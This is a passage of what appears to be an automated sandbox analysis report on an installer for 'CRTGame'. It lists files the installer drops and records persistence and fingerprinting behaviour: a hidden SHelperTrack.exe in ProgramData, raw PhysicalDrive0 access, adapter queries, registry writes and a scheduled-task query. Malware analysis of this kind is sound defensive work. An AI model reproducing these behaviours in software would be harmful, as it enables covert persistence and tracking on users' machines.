                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ8MN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-Q9IJU.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-DG85B.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-IM6II.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\uninstall\is-785C0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-UN741.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-O51E5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-HP7BQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-5QDBA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-FBHNA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-I5CC7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-8JJ67.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-E5NVS.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-D10RQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-GSGD0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-JISVL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-LVBK5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-EATSP.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\crtgame.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_RegDLL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-6S6NV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeFile created: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-I1OEI.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-4CPU3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-JU8A8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-SJ07E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-LP9D8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-QQL7E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-DTLCM.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RGK44.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-KU7UG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ2FQ.tmpJump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SHelperTrack\SHelperTrack.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_00401A58
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive07_2_02C4F29C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004026EE GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,CreateThread,WaitForSingleObject,ExitProcess,StartServiceCtrlDispatcherA,5_2_004026EE
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,1_2_004241EC
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004241A4 IsIconic,SetActiveWindow,1_2_004241A4
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418394
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042286C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004175A8 IsIconic,GetCapture,1_2_004175A8
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00417CDE IsIconic,SetWindowPos,1_2_00417CDE
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CE0
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00481CB0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00481CB0
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEAC
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,5_2_00401B54
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,7_2_02C4F3A0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeWindow / User API: threadDelayed 2634Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeWindow / User API: threadDelayed 7327Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RJL72.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RJI5O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-5JD36.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-P33NB.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-ULG4P.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-8DLTN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GN0SC.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-H6A9P.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-9A8PJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-J56NG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-CHRTV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PJQ9V.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-AMJ3K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MDQ87.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-ODQUV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OSQAA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2V0OO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HLDR5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UVN7O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ8MN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-Q9IJU.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)Jump to dropped file
